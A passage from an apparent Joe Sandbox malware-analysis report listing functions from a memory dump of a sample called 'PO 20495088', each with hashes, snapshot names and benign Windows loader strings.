                                                                                                        • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                                                                                        Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                        • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                                                                                        • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                        • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                                                                                        Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                        • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                        • API String ID: 0-4066393604
                                                                                                        • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                        • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                                                                                        • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                        • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                                                                                        Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                        • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                                                                        Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Legacy$UEFI
                                                                                                        • API String ID: 2994545307-634100481
                                                                                                        • Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                                        • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                                                                        • Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
                                                                                                        • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                                                                        Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$MUI
                                                                                                        • API String ID: 0-17815947
                                                                                                        • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                        • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                                                                        • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                        • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                                                                        Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • kLsE, xrefs: 01720540
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                        • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                                                                        • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                        • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                                                                        Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                        • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                                                                        • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                        • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                                                                        Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                        • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                                                                        • Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                        • Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56
                                                                                                        Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MUI
                                                                                                        • API String ID: 0-1339004836
                                                                                                        • Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                        • Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
                                                                                                        • Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
                                                                                                        • Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50
                                                                                                        Function 017A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                        • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                                                                                        • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                                                                                        • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                                                                                        Function 017CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                        • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                                                                                        • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                                                                                        • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                                                                                        Function 0175A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: GlobalTags
                                                                                                        • API String ID: 0-1106856819
                                                                                                        • Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                        • Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
                                                                                                        • Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                                                                                        • Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50
                                                                                                        Function 017C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .mui
                                                                                                        • API String ID: 0-1199573805
                                                                                                        • Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                        • Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
                                                                                                        • Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                                                                                        • Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4
                                                                                                        Function 0173E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: EXT-
                                                                                                        • API String ID: 0-1948896318
                                                                                                        • Opcode ID: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                                                                        • Instruction ID: efd5843aef838ffb2ec29d22b7bfa9a209583a2626ee88f5456fd93e4cfea7a7
                                                                                                        • Opcode Fuzzy Hash: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                                                                                        • Instruction Fuzzy Hash: C941A0725083169BD722DA75C844BABFBE8AFC8714F04092DFA84E7181EB74D904C797
                                                                                                        Function 0179C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryHash
                                                                                                        • API String ID: 0-2202222882
                                                                                                        • Opcode ID: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                        • Instruction ID: e7619280901aa4b5581a27708df533cc6afe36f773f073f6e86c43d4470e76ea
                                                                                                        • Opcode Fuzzy Hash: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                                                                                        • Instruction Fuzzy Hash: 3C4162B1D0022DAEDF21DB50DC84FDEF77CAB44714F0045A5AB08AB145DB709E888FA4
                                                                                                        Function 017B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        • Opcode ID: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                        • Instruction ID: b3f84210d92c9709e29ef309312cdd939782f527da144a47024e5e49e212d910
                                                                                                        • Opcode Fuzzy Hash: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                                                                                        • Instruction Fuzzy Hash: EB310531A007199BEB22DF69C894BEEFBB8DF45704F144068FA45AB282DB75ED05CB50
                                                                                                        Function 0179CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryName
                                                                                                        • API String ID: 0-215506332
                                                                                                        • Opcode ID: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                                                                        • Instruction ID: a18ef6f5ee8c1b62f4cd8f612f696ce074dd49b5d16868ffe456a716a9411bc3
                                                                                                        • Opcode Fuzzy Hash: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                                                                                        • Instruction Fuzzy Hash: F3310336900515AFEF16DB58D845E7FFB74EB80760F014169A905AB291D7309E08EBE0
                                                                                                        Function 017A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017A895E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                        • API String ID: 0-702105204
                                                                                                        • Opcode ID: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                        • Instruction ID: e12fd571fead50e5b09d6e6fd561b46269c75837e558d974914eaf9a1ed8d91a
                                                                                                        • Opcode Fuzzy Hash: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                                                                                        • Instruction Fuzzy Hash: 64012B732002119BE7216B59CC88E96FF69EFC6755B84022CF78506559CB246882CB93
                                                                                                        Function 017C2000 Relevance: .8, Instructions: 757COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                        • Instruction ID: 97ec14549b2f282836cc629e00522456579741ba0f8ca51d020da1a4436ceb96
                                                                                                        • Opcode Fuzzy Hash: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                                                                                        • Instruction Fuzzy Hash: D442D2766083419FE725CF68C890A6BFBE5BFC8B40F18092DFA8297252D770D945CB52
                                                                                                        Function 017B8158 Relevance: .6, Instructions: 617COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                        • Instruction ID: 71a1ead87f07317500e1e874433b712355e7a394e111563f06fc769464fcb846
                                                                                                        • Opcode Fuzzy Hash: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                                                                                        • Instruction Fuzzy Hash: F8424D75A102198FEB24CF69C881BEDFBF9BF48304F188199E949EB242D7349985CF51
                                                                                                        Function 01732840 Relevance: .6, Instructions: 605COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                        • Instruction ID: b43ae686c2182e96e1084eaf4d94d3af3f027e43e54e6f2f9e4865f07666ea20
                                                                                                        • Opcode Fuzzy Hash: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                        • Instruction Fuzzy Hash: 6E32F070A40755AFEB25EF69C8487BEFBF2BF84304F24411DE58A9B285D735A842CB50
                                                                                                        Function 017CA118 Relevance: .6, Instructions: 591COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                        • Instruction ID: 4ae8b1277a4f1497b5cc96fab624c2b81cbe4d1919f89a15483374f7d94650db
                                                                                                        • Opcode Fuzzy Hash: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                        • Instruction Fuzzy Hash: 0B22AD706046698BEB25CF2DC094772FBF1BF84B02F18849ED9868B286F735D552DB60
                                                                                                        Function 01726A50 Relevance: .5, Instructions: 548COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                        • Instruction ID: 0ddf44e4240fc6dc4a600ebd960d571f9509ee258f4b418eb5470495567e89ea
                                                                                                        • Opcode Fuzzy Hash: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                        • Instruction Fuzzy Hash: D0329F71A04215CFDB25DF68C480BAAFBF1FF48310F2485AAE956AB755D734E842CB50
                                                                                                        Function 01744A35 Relevance: .4, Instructions: 423COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                                                                                        Function 017B892B Relevance: .4, Instructions: 386COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                        • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                                                                                        • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                        • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                                                                                        Function 017265D0 Relevance: .4, Instructions: 383COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                        • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                                                                                        • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                        • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                                                                                        Function 01718397 Relevance: .4, Instructions: 380COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                        • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                                                                                        • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                        • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                                                                                        Function 017A8243 Relevance: .3, Instructions: 322COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
